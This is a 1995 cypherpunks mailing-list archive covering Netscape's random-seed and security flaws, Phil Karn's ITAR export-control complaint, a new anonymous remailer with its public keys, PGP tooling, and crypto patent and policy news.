you have a bug, and you try to call us for help, > we will not provide it. As much as this might put me at odds with certain parts of the CP community, this seems quite reasonable to me. After all, why should someone provide support for a platform which is not generating revenue? > > > I have not constructed a business case which would cause Netscape > > > to begin support for Linux versions of the Navigator. Right now, I'm > > > not sure that making a point of this would do what you want. > > > > That all depends on what you mean by "support". If you mean "we will no > > longer make Netscape available for the Linux platform", that's not > > support.
If you mean "we will no longer respond to bug reports for > > Netscape on this platform" then that's discontinuing support. > > We have never officially responded to bug reports on Linux. We do not > take money for it for just this reason. This does not mean that we will > not fix bugs that are reported via our feedback page. It doesn't mean > we will fix them either... Understood. Thanks for the clarification :) - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From aleph1 at dfw.net Mon Sep 25 00:30:00 1995 From: aleph1 at dfw.net (Aleph One) Date: Mon, 25 Sep 95 00:30:00 PDT Subject: secure file system for Linux? In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com> Message-ID: Crypto Filesystem works just fine. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Sun, 24 Sep 1995 Mike_Spreitzer.PARC at xerox.com wrote: > Date: Sun, 24 Sep 1995 22:29:48 PDT > From: Mike_Spreitzer.PARC at xerox.com > To: cypherpunks at toad.com > Cc: Mike_Spreitzer.PARC at xerox.com > Subject: secure file system for Linux? > > Is there a secure file system (or secure directory branch) for Linux?
> From jsw at neon.netscape.com Mon Sep 25 00:32:57 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Mon, 25 Sep 95 00:32:57 PDT Subject: New Netscape RNG In-Reply-To: <199509250649.CAA27099@clark.net> Message-ID: <445lti$hej@tera.mcom.com> In article <199509250649.CAA27099 at clark.net>, rjc at clark.net (Ray Cromwell) writes: > I'm thinking from the standpoint of someone gathering data on someone > or some server to mount a specific attack. a "most common directories > on the macintosh" file for instance could be used to attack the > current directory method. > > Using those sources probably can't hurt, they just seemed > like odd choices, "grasping for straws" so to speak. I'd rather think of it as a "kitchen sink" approach :-). We are looking for bits wherever we can find them. We are not experts in the internals of all of our supported systems, so any suggestions people could provide for more high quality sources on specific systems would be appreciated. > Nevertheless, I would like to commend Netscape for releasing > the source code for public review. You guys are clearly an intelligent > company, in both your current developments, but also the way > you have handled this bad press. I'd like to add that management has been very supportive of this idea. Barksdale was in the cellular industry when their security through obscurity measures failed, so he knew exactly what we were talking about. > p.s. i hope you guys do a good internal review of your code to remove > buffer overflow bugs We have had code reviews. We will be fixing several of this sort of bug in the upcoming patch. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From gnu at toad.com Mon Sep 25 01:35:10 1995 From: gnu at toad.com (John Gilmore) Date: Mon, 25 Sep 95 01:35:10 PDT Subject: Phil Karn's legal case is filed; here's the Complaint. 
Message-ID: <9509250835.AA05551@toad.com> Full info is at http://www.qualcomm.com/people/pkarn/export/index.html.

UNITED STATES DISTRICT COURT FOR THE DISTRICT OF COLUMBIA

PHILIP R. KARN, JR.
7431 Teasdale Avenue
San Diego, California 92122
Plaintiff,

v.

U.S. DEPARTMENT OF STATE
2201 C Street, N.W.
Washington, D.C. 20520

and

THOMAS E. MCNAMARA
Assistant Secretary
Bureau of Political-Military Affairs
U.S. Department of State
Room 7325
2201 C. Street, N.W.
Washington, D.C. 20520
Defendants.

Case 1:95CV01812

COMPLAINT

COMES NOW the plaintiff PHILIP R. KARN, JR., by and through his undersigned counsel of record, and for his causes of action against the named Defendants states the following: 1. Plaintiff PHILIP R. KARN, JR. is a resident of San Diego, California. 2. Defendants, U.S. DEPARTMENT OF STATE and THOMAS E. MCNAMARA, Assistant Secretary of the U.S. Department of State of the United States of America, proceeded against in his official capacity, are charged with, inter alia, the administration of the Arms Export Control Act ("The Act"), 22 U.S.C. 2778 et seq., and the International Traffic in Arms Regulations ("The ITAR") 22 C.F.R. Subchapter M. (Subsequent citations to the ITAR are with a section designator only.) 3. This is an action for a declaratory judgment pursuant to 28 U.S.C. 2201, for the purpose of determining a question of actual controversy between the parties as is herein more fully set forth. Jurisdiction and Venue 4. Jurisdiction of this action is based on 28 U.S.C. 1331, in that it is a civil action arising under the laws of the United States, and the First and Fifth Amendments to the Constitution of the United States. 5. Venue is proper in this Court pursuant to 28 U.S.C.
1391, in that this is a civil action against an officer of the United States and the decisions, which are the subject of this action, were made within the District of Columbia. Causes of Action 6. Plaintiff KARN hereby realleges and incorporates by reference, as though fully set forth herein, the allegations of paragraphs 1-5. 7. The ITAR is implemented by the Office of Defense Trade Controls ("the Office"). 8. Under § 120.2 of the ITAR, the Office is responsible for reviewing and determining whether particular products and technologies are defense articles, as defined at § 120.6, technical data, as defined at § 120.10, or defense services, as defined at § 120.9, and, therefore, subject to the prior export licensing requirements of the ITAR. Such articles, services and technical data are described in § 121.1, which is styled the United States Munitions List ("the USML"). Products and technologies, which are neither defense articles nor defense services, as defined in the ITAR, are subject to the export licensing jurisdiction of the Department of Commerce. 9. The ITAR provides a procedure for the determination of whether a particular product or technology is subject to its licensing requirements. See § 120.4. Upon receipt of a written Commodity Jurisdiction Request, a determination is made as to whether an item is included on the USML. A "commodity jurisdiction" procedure entailing consultations among the Departments of State, Commerce, and Defense is used to make the determination. 10. Under § 120.10, information that is in "the public domain" is not subject to the ITAR's export licensing controls. 11. Pursuant to § 120.4, Plaintiff KARN on February 12, 1994 initially submitted a Commodity Jurisdiction Request for Applied Cryptography, a book ("the Book") by Bruce Schneier, which was published in this country. 12. The Book was published by John Wiley & Sons, Inc. It is available from most bookstores that carry computer books and has a list price of $44.95.
It has sold approximately 20,000 copies worldwide. 13. The Book contains computer source codes, detailed descriptions and instructions on how to use a wide variety of cryptographic algorithms, and explains how computer programmers designing computer applications, networks and storage systems can use cryptography to maintain the privacy and security of computer data. 14. Cryptography is a mathematical technique used to protect the secrecy of electronic communications between individuals by scrambling, or encrypting, communications so that only particular recipients with a "key" to decrypt the communications may decipher them. Cryptographic software programs that protect the confidentiality of electronic communications are created by using programming instructions, or source code algorithms. These are sophisticated mathematical equations that are expressed in computer source code and converted into computer programs. Cryptography has a variety of commercial uses including confidentiality of electronic mail, computer software, voice, video and other information in digitized form. 15. Part Five of the Book contains a full-text actual source code listing for fourteen cryptographic algorithms in the C programming language, which were developed by various sources at various times using both private and public sources of funding. A two- disk cryptographic source code set ("the Diskette Set"), which includes the same codes printed on pages 456-570 of Part Five of the Book, is offered for sale on its last page. 16. Binary copies of several of the source code algorithms published in Part Five of the Book are also publicly available from anonymous file transfer protocol ("FTP") sites outside the United States. 17. In a letter dated March 2, 1994, the Office concluded that the Book, including the source code in Part Five, was in "the public domain." 
The Book was accordingly transferred to the export jurisdiction of the Department of Commerce, where it is eligible for export to all destinations under a general license. (A general license is one which is generally available and need not be specifically applied for in advance of any export.) 18. The March 2, 1994 ruling from the Office expressly did not extend to the Diskette Set. 19. On March 9, 1994, Plaintiff KARN submitted a second Commodity Jurisdiction Request ("the Second Filing") for a determination as to whether a Diskette ("the Diskette") containing only the source code information, as set out in Part Five of the Book, was subject to the export licensing requirements of the ITAR. The only difference between the information contained on the Diskette and Part Five of the Book is the medium used: magnetic pulses on Mylar instead of inked characters on paper. 20. Plaintiff KARN is desirous of exporting the Diskette to fulfill his interest in the dissemination of cryptographic information. 21. The Office responded to the Second Filing on May 11, 1994 and stated that the Diskette is a defense article under Category XIII(b)(1) of the USML and, therefore, subject to the export licensing jurisdiction of the ITAR. 22. On June 7, 1994 Plaintiff KARN appealed the May 11, 1994 determination of the Office to the Deputy Assistant Secretary of State for Export Controls ("the DAS"). 23. On October 7, 1994 the DAS responded to Plaintiff's appeal by affirming the Office's determination and concluding that the Diskette was a defense article because it was cryptographic software, notwithstanding the fact that the information it contains is identical to that in Part Five of the Book. 24. Pursuant to § 120.4(g), the DAS's determination was appealed to the Assistant Secretary of State for Political-Military Affairs on December 5, 1994. 25.
On June 13, 1995 the Assistant Secretary of State for Political-Military Affairs ("the Assistant Secretary") reaffirmed the DAS's determination but failed to address the fact that the information contained in the Diskette is identical to that in Part Five of the Book, which was already found not to be subject to the licensing jurisdiction of ITAR. 26. No additional appeals mechanism is set forth in the ITAR with respect to commodity jurisdiction determinations. 27. Plaintiff has exhausted his administrative remedies, therefore, this matter is "ripe" for judicial review. 28. The application of the ITAR provisions to Plaintiff KARN, which require the application for and issuance of a license prior to any export, has caused him unusual hardship and irreparable injury in that he has been and is currently being denied the free exercise of constitutional rights as more fully stated below. Plaintiff has no adequate remedy at law for these injuries; accordingly, he is entitled to declaratory relief. 29. The actions of Defendants restricting the dissemination of information contained on the Diskette, which is identical to the information contained in Part Five of the Book, are arbitrary and capricious, constitute an abuse of discretion and are otherwise not in accordance with the Administrative Procedure Act ("the APA") at 5 U.S.C. 706(2)(A). 30. As set forth below, the actions of Defendants restricting the dissemination of information contained on the Diskette, which is identical to the information contained in Part Five of the Book, are contrary to Plaintiff's constitutional rights and, therefore, not in accordance with the APA at 5 U.S.C. 706(2)(B). 31. 
The Office's determination, and its subsequent reaffirmation by the DAS, and the Assistant Secretary subjecting the Diskette to export licensing controls when the information it contains is identical to the published text of Part Five of the Book, which was deemed not subject to such export controls, is irrational, arbitrary, and capricious. These arbitrary and capricious actions violate Plaintiff's Fifth Amendment right to substantive due process. 32. The Office's determination, and its subsequent reaffirmation by the DAS and the Assistant Secretary, to control the export of the Diskette containing information set forth in a published book is a violation of Plaintiff's fundamental First Amendment right to free speech. 33. As applied by Defendants, the ITAR requires Plaintiff to apply for a license to export the Diskette containing information identical to that in Part Five of the Book. Therefore, as applied to Plaintiff in this instance, the prior licensing requirement of the ITAR operates as a prior restraint on Plaintiff's disclosure of ideas and information in violation of his First Amendment rights to free speech. 34. As applied to Plaintiff, § 120.4 dealing with the determination of whether particular products and technologies are defense articles, is unconstitutionally overbroad and vague, as it includes within its scope speech protected by the First Amendment, namely material contained in the Book, thereby chilling the exercise of free speech rights. Prayer for Relief WHEREFORE, Plaintiff KARN prays for judgment against Defendants, U.S. DEPARTMENT OF STATE and MCNAMARA, as follows: A. Declaring that the provisions of the ITAR, as applied to Plaintiff KARN, be declared null and void, of no effect, as unconstitutional under the Fifth and First Amendments. B. Declaring that the determination to subject the Diskette to the export licensing controls of ITAR is unlawful in violation of the APA at 5 U.S.C. 706(2)(A) & (B). C. For attorneys fees incurred herein.
D. For costs of the action incurred herein and E. For such other and further relief as the Court deems just and proper. From wilcoxb at nag.cs.colorado.edu Mon Sep 25 02:50:19 1995 From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox) Date: Mon, 25 Sep 95 02:50:19 PDT Subject: ANNOUNCE: Bryce's Auto-PGP v1.0 available for 10 cyberbucks Message-ID: <199509250950.DAA27187@nag.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- I'm pleased to announce the release of "Bryce's Auto-PGP" version 1.0. Bryce's Auto-PGP, a.k.a. "BAP", is a Unix script which makes it simple and convenient to use PGP with almost any Unix message-handling application. As far as I know there is no Unix message-handling application that cannot be integrated with BAP. BAP has been tested by me personally with Elm, Pine, mh and trn, and it has also turned out to be useful with such Unix utilities as finger and vi. I'm distributing BAP from my World Wide Web site: http://www-ugrad.cs.colorado.edu/~wilcoxb/BAP.html As an experiment in cyberspace economics, I am asking for 10 cyberbucks, the currency for the Internet created by DigiCash company in return for BAP. To sign up for the cyberbuck trial and get your free cyberbucks visit: http://www.digicash.com/ecash/ecash-home.html If you have any problems acquiring or using BAP, please e-mail me. Bryce signatures follow To strive, to seek, to find and not to yield.
bryce at colorado.edu http://ugrad-www.cs.colorado.edu/~wilcoxb -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 -----END PGP SIGNATURE----- From frissell at panix.com Mon Sep 25 03:33:48 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 25 Sep 95 03:33:48 PDT Subject: Net Gambling on CNN Message-ID: On Sunday's Point-Counterpoint on CNN, Sen. Richard Lugar who is pushing a Federal commission on gambling mentioned gambling on the Internet half a dozen times. His motive seemed to be to give the Feds an excuse for getting involved in gambling control. He also mentioned Federal regulation of Indian reservations in this context. What he wants to do is discourage state promotion of gambling. Net Gambling is really on the table. DCF From rfb at lehman.com Mon Sep 25 09:56:22 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Mon, 25 Sep 95 09:56:22 PDT Subject: Decompiling Netscape In-Reply-To: <199509221732.NAA17523@clark.net> Message-ID: <9509251604.AA28123@cfdevx1.lehman.com> From: Ray Cromwell Date: Fri, 22 Sep 1995 13:32:57 -0400 (EDT) Anyone want to lend me a hand in finding and disassembling the routine responsible for the buffer overflow in Netscape? Or atleast tell me how you did it. (I hope it wasn't done by single stepping thru functions in GDB) I missed the whole Netscape RNG decompilation thread. You could win a T-shirt for your help! Under Unix, you can use objdump, e. g.

% objdump -d netscape
netscape: file format a.out-sunos-big
No symbols in "netscape".
Disassembly of section .text:
00002020 clr %fp
00002024 ld [ %sp + 0x40 ], %o0
00002028 add 0x44, %sp, %o1
0000202c sll %o0, 2, %o2
00002030 add 4, %o2, %o2
00002034 add %o1, %o2, %o2
. . .
This should work wherever other GNU utilities work. objdump is part of GNU binutils. -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From attila at primenet.com Mon Sep 25 09:56:45 1995 From: attila at primenet.com (attila) Date: Mon, 25 Sep 95 09:56:45 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? In-Reply-To: Message-ID: "free" access to source code and "free" source code w/ free binaries are too often confused. in and of itself, GNU or Stallman are not providing free software for whatever use. GNU allows free distribution, but not free commercialization --a good idea except critical maintenance is at the time-available consideration of the author. Sun permits access (well, relatively free) access to their source code for the Java Series and is actively promoting open porting. personally, I like Java/Hot Java. as to a GNU-like product, I concur with TCM -it needs to be done before the commercial interests, politicians, NSA, and assorted crooks control the means whereby we communicate, and the browser, IMHO, has improved our communication and access to information by many orders of magnitude. Now, if any of the non-Gates browsers could fully support multi-use/multi-view mail, news, and info browse at the same time.... I have the code for Mosaic, Java, etc. --they are not trivial. and don't forget VGML. ===================== ORIGINAL MESSAGE ============================= On Thu, 21 Sep 1995, Timothy C. May wrote: > > I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA > Mosaic gives me a thought: > > [snip] > > Why not a Gnu-style Web browser? I don't know if the original Mosaic can be > used and added to, but I can imagine something like this could be done.
>
> Web browsers are becoming, for many of us, our de facto interfaces to the
> Net, not just the Web. A project to make a truly freely distributable Web
> browser and Web server (the other part of the puzzle) could be interesting.
> Strong crypto could be added by volunteers working in their specialties,
> and the "Web proxie" could be put in with robustness (D-H forward secrecy,
> for example).
>

amen!

>
> I'll stop now, as I've never been a Gnu customer (except for Emacs), and so
> I'm not really in a position to comment and speculate on Gnu.
>
> For all I know, Stallman and others have already thought of this and are
> working on it.
>
> --Tim May
>

From blane at eskimo.com Mon Sep 25 10:01:15 1995
From: blane at eskimo.com (Brian C. Lane)
Date: Mon, 25 Sep 95 10:01:15 PDT
Subject: Crypto in Wired
Message-ID: <199509251504.IAA12863@mail.eskimo.com>

On Sun, 24 Sep 1995 20:00:02 -0400 you wrote:

>Good issue of Wired this month (10/95)
>

I also noticed that on page 35 Chrysler has awarded Philip Zimmermann a 1995 Chrysler Award of Innovation in Design. It's nice to see large corporations taking notice of cryptography.

Brian

---------------------------------------------------------------------------
blane at eskimo.com            | Finger for PGP key
http://www.eskimo.com/~blane | Privacy, Security, and Electronics
ftp://ftp.eskimo.com/~blane  | Misc. Interesting files

From wmono at Direct.CA Mon Sep 25 10:02:11 1995
From: wmono at Direct.CA (William Ono)
Date: Mon, 25 Sep 95 10:02:11 PDT
Subject: New remailer now active.
Message-ID: <199509251503.IAA08771@fun.direct.ca>

-----BEGIN PGP SIGNED MESSAGE-----

I have an anonymous remailer running at wmono at spook.alias.net - the domain may or may not change (anybody have any suggestions?). It runs Mixmaster 2.0.1 and Ghio2 to give both Type I and Type II support. In the near future, when I have some time on my hands, I will upgrade to Mix2.0.2. This remailer is going public as of now.
I have sent this message to cypherpunks, remailer-operators, and rops, so my apologies in advance if you receive multiple copies.

Please add it to your pingers and cover-traffic generators. Although I have tested this remailer a lot, I have only done so from two accounts, therefore I am not certain of its reliability. Hopefully any such problems will be ironed out over the next few days. For this reason, I would advise against using it for sensitive materials for a week or so.

If you encounter any difficulties, please contact me at the remailer's address. Mail sent regarding the remailer to wmono at direct.ca (my main address) will be ignored and/or deleted.

The Type I remailer's default latency is set to 900 seconds (15 minutes), so add a Latent-Time: +0:00 header if you want an immediate response.

The keys are below.

From: wmono at spook.alias.net (Anonymous Remailer)
Subject: Remailer keys (as requested)

Type I (ghio2) remailer key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAzBeRcEAAAEDAMBA+IsCBBGwlCOpfsb0mqL6EiJGu/vnTjTcUPkz9yd8roz7
ym9qLpE9CVL0ND7kh8ctjmPfuvagt8VWhsvfo0cjpBY4J/1CtJelgTXCROyFsJGi
88V/fihQeq3u6De5iQAFEbQqQW5vbnltb3VzIFJlbWFpbGVyIDx3bW9ub0BzcG9v
ay5hbGlhcy5uZXQ+iQCVAwUQMF5GJjncl2jz9xa9AQGXHAP7BaO5SDFkSGnhB0vZ
UzPfC60WUhgq5mPHzmOYfrjiPPDz+MGmLs95zgAgkwNekYSBo9CQ9V9GIC+ZKV/R
CWyfkJEQsY7q4kku6BPYnkXhKuelt/vdLmyguEVbwsUrrLwFKNAGg2RiCZUrk/ej
6l7vIQpPuIZ2uKrteM8Opk3WK9SJAHUDBRAwXkclUHqt7ug3uYkBAXLpAv9BbjrL
RQe1m97hdE1J+nKWh+hUPILQa2U57LoFG18KRYsQcnrRjeYcIDN6Skc7AOOK21Ie
j44dn6T+9hXCokys7V09xRWpNamKbb6CpsVzM/T5OolXVq7LrkB5gV7VlJE=
=a8ZW
- -----END PGP PUBLIC KEY BLOCK-----

Type II (Mixmaster 2.0.1) remailer key:

=-=-=-=-=-=-=-=-=-=-=-=
wmono wmono at spook.alias.net f68e6add16880b60eb48a4a4330e2e36 2.0.1

- -----Begin Mix Key-----
f68e6add16880b60eb48a4a4330e2e36
258
AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN
RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA
T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0
UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U
SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

- -- 
** NOTE NEW KEY ** As of 08/28/95! Old key 0x2902B621 COMPROMISED!
William Ono  PGP Key: F3F716BD
fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!  "640k ought to be enough for everybody."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGbDUjncl2jz9xa9AQH4RAP+PKHtLC4m3yNH2jZB2VK/Omod+lAqTfVZ
fQkmB6zTCi4y0++8zOLyhyzOZJaG3mwDe++DsW5qf3N7KSfcGlwdwChukyAvnzUC
9YxGODMj0x0a8cj/6XvClMsFtB99clzSfhy8IcTdSQDJOv5PoeHo1GkTuXvgjIyY
2YCDG/pdQpg=
=L3cw
-----END PGP SIGNATURE-----

-- 
** NOTE NEW KEY ** As of 08/28/95! Old key 0x2902B621 COMPROMISED!
William Ono  PGP Key: F3F716BD
fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!  "640k ought to be enough for everybody."

From m5 at dev.tivoli.com Mon Sep 25 10:03:35 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Mon, 25 Sep 95 10:03:35 PDT
Subject: `Random' seed.
In-Reply-To: <9509251229.AA23816@alpha>
Message-ID: <9509251324.AA23974@alpha>

Rick Busdiecker writes:
> I don't think that anyone has suggested otherwise. I believe that
> `clock skew' was the underlying source of randomness that Matt Blaze
> mentioned in the message where I first saw that code.

Yes, looking at Matt's code I think I believe it.

> I have no idea how reasonable it would be to use this approach in
> Netscape, however if it were available as an option to generate, say
> 300 bits, I'd personally be plenty willing to let it chew up five
> minutes while I get my morning caffeine.

If you look at it that way (the software just generates new bits every once-in-a-while, like daily) I guess I wouldn't mind.
I mean, heck, it's not like there aren't 3 dozen other random daemons that pop up and eat my CPU every now and then :-) It'd only really be a problem if it were used as an "operational" source of random bits.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX       |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From dlv at bwalk.dm.com Mon Sep 25 10:04:05 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 25 Sep 95 10:04:05 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in
In-Reply-To: <9509250357.AA21926@cs.umass.edu>
Message-ID: <0THZBD10w165w@bwalk.dm.com>

Some unknown person writes:

>> It just moves the prior art date from the date of invention to the date
>> of filing the patent application.
>What happens if the chronology goes like this ?
>
>(0) Alice invents a snaffleblort.
>(1) Bob invents a snaffleblort.
>(2) Bob files for a patent on a snaffleblort.
>
>From what you said, it would appear that Alice's prior art won't count when
>it comes to considering the validity of Bob's patent claim. Is that correct?

The bizarre history of the invention of radio comes to my mind. Perhaps we can learn something from it.

The Russian Alexander Popov taught for 18 years at a naval school in Kronstadt (near St Petersburg, Russia). He was fascinated by Hertz's 1888 paper on electromagnetic waves and worked with his students on improving his results. In 1889 the Russian Navy granted him funds to investigate the use of electromagnetic waves for telecommunications. It's undisputed that Popov invented the antenna in 1894, and built a (subsequently widely used) apparatus for advance warning of thunderstorms in 1995.
Now the disputed part: Popov published his paper _Pribor dlja obnaruzhenija i registrirovanija elektrichiskikh kolebanij_ in the January 1896 issue of _Zhurnal Russkogo Fiziko-Khimicheskogo Obshchestva_. In it he described the first radio receiver. On May 7, 1895 and March 12, 1896 Popov made public presentations to the Russian Physico-Chemical Society demonstrating his invention and (in March 1896) transmitted the words "Heinrich Hertz" (in a Morse-like code) at a distance of 250 meters.

In June 1896 Guglielmo Marconi filed for a patent in England. He offered to the British government his inventions for wireless transmission of signals, whose details he kept secret. The news of his application and the description of his invention weren't made public until June 1897, when the patent was granted, at which point Popov raised hell and wrote letters to numerous newspapers, claiming that Marconi's patent application was substantially identical to Popov's publications.

Meanwhile, Popov continued working on his transmitters/detectors; by the spring of 1897 he was transmitting at 640m. He got more funds and built 5km equipment by the summer of 1897. In 1900 he installed a production radio-telegraph system between several islands in the Gulf of Finland 50 km apart. After the Marconi incident, Russians viewed radio transmissions technology as a military secret and didn't publish these results until many years later, although comparable technology was available commercially in the West.

Popov was always low on funds. Marconi, a brilliant entrepreneur, sold stock in his corporation, raised capital, hired other prominent scientists to work with him, and was developing new technologies much faster. In 1901 Marconi was transmitting radio signals across the Atlantic Ocean, and Popov retired from the naval school and went to teach at the SPB electro-technical institute; he was soon elected its president.
In 1904, before the beginning of the Russo-Japanese war, the Russians had to buy in a great hurry a large quantity of radio receivers/transmitters - made commercially in Germany under Marconi's patent. Popov, no longer with the Navy, got to supervise their installation in Russian naval ships. (Russia lost that war pretty miserably, by the way.)

What, you might ask, is the cryptographic relevance of all this? Well, in 1914 Russia was waging war against Germany. Russian military officers in East Prussia relied on radio to transmit information. Russians knew about crypto, but the key distribution was so screwed up that most of their transmissions were in cleartext. (Besides, radio was supposed to be a Russian invention not available to the uncultured foreigners.) Germans reportedly found the intercepted radio transmissions most helpful. Germans also broke the weak code used by the Russians in East Prussia within weeks. Their complete knowledge of Russian weaknesses and troop movements led to Russian defeat in East Prussia, after initial advances. (The last claim is from the book _Tajnopis' v istorii Rossii_ (Cryptography in Russian history) by T. A. Soboleva; someone ought to publish its translation.)

Soboleva also mentions that East Prussia had an advanced phone system which the Russians didn't disable. On several occasions German civilians from remote farms called Germany from across the front lines and reported on what the Russians were up to.

---
Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From bal at martigny.ai.mit.edu Mon Sep 25 10:05:14 1995
From: bal at martigny.ai.mit.edu (Brian A. LaMacchia)
Date: Mon, 25 Sep 95 10:05:14 PDT
Subject: RSA/Cylink arbitration agreement on-line
Message-ID: <199509251414.HAA29497@cygnus.com>

[I haven't seen this mentioned yet on the list...]

Cylink has been kind enough to put a copy of the arbitration panel's decision on their web page. Cylink's home page is www.cylink.com.
The URL for the actual agreement is:

  http://www.cylink.com/arbtrn_1.html

Spin doctors aside, it doesn't look like either company gained much over the other. I'm not an attorney, but the way I read the agreement RSAREF can continue to be used without violating the Stanford patents. RSA DSI cannot *sublicense* the Stanford patents to third parties, but can *sell code* that practices the methods claimed in the Stanford patents. That code can then be incorporated into other products, which is exactly what PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which is covered by the RSAREF license agreement).

--bal

From adam at lighthouse.homeport.org Mon Sep 25 10:05:33 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Mon, 25 Sep 95 10:05:33 PDT
Subject: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251359.JAA21321@homeport.org>

Jeff Weinstein wrote:
|
| More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin,
| and feed it through the RNG hash. On Unix and PC systems we feed the
| environment through the hash, so that would be a good place for a
| concerned user to put some random stuff of their own.

On a SunOS (or any BSD) box ps -e will get you environment variables.

  ps -eaxuw
  USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
  root        53  0.0  0.0   68    0 ?  IW   Sep 19  0:02 portmap HOME=/ PATH=/bin:/usr/bin:/usr/etc:/usr/ucb
  root        68  0.0  0.0   16    0 ?  I    Sep 19  0:00 (biod)
  root        58  0.0  0.0   40    0 ?  IW   Sep 19  0:00 keyserv HOME=/ PATH=/bin:/usr/bin:/usr/etc:/usr/ucb

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
                                                        -Hume

From khijol!erc at cygnus.com Mon Sep 25 10:05:57 1995
From: khijol!erc at cygnus.com (Ed Carp [khijol SysAdmin])
Date: Mon, 25 Sep 95 10:05:57 PDT
Subject: Netscape flaw hits the big time
Message-ID: <199509251404.JAA08561@khijol>

-----BEGIN PGP SIGNED MESSAGE-----

Just heard on the CBS hourly radio news that Netscape will release a new version on Wednesday correcting a flaw that would "allow hackers access credit card numbers." As usual, they got it all wrong, but what do you expect?

- --
Ed Carp, N7EKG  Ed.Carp at linux.org, ecarp at netcom.com
214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key  an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGa29CS9AwzY9LDxAQHJwAQAlCcmPauUPnBIpBx5e5ZZpdnQZk5dhEMe
BMZe+aA+A0mZ6aqgiA8wzZyjbSkYMuzoUM+IQi4c4MraoWNXGAFfO+9dL4WMmdqI
AMBk6WaIoiYjCjCd7SNxETlh4+BaWICul/04isiiLE345j6VgU2xGtJZT4UJMurf
6/dy7ztSYEQ=
=P3jw
-----END PGP SIGNATURE-----

From jya at pipeline.com Mon Sep 25 10:06:52 1995
From: jya at pipeline.com (John Young)
Date: Mon, 25 Sep 95 10:06:52 PDT
Subject: WSJ on Netscape Hole 3
Message-ID: <199509251351.JAA11538@pipe4.nyc.pipeline.com>

The Wall Street Journal, September 25, 1995, p. B12.

Netscape Software for Cruising Internet Is Found to Have Another Security Flaw

By Jared Sandberg

Another security flaw that has long plagued the Internet has been found in software by Netscape Communications Corp. and others, raising concerns for the privacy and safety of information on the global computer network.

The flaw in Netscape's popular Navigator software, which helps users cruise the multimedia portion of the Internet known as the World Wide Web, is the third defect in the software discovered by the "Cypherpunks" discussion group in little over a month.
Members of the Cypherpunk group, which includes mathematicians and hackers who discuss the security method of cryptography, last month broke Netscape's "key" that protects sensitive data by "brute force" -- the use of massive computing power. Last week, other members found a flaw that could let hackers essentially pick the lock in Netscape's software.

Unlike the prior glitches, however, the latest flaw doesn't lend itself to the theft of multiple credit-card numbers. Instead, it could allow a savvy hacker to damage an Internet user's computer, such as crashing the computer or deleting files.

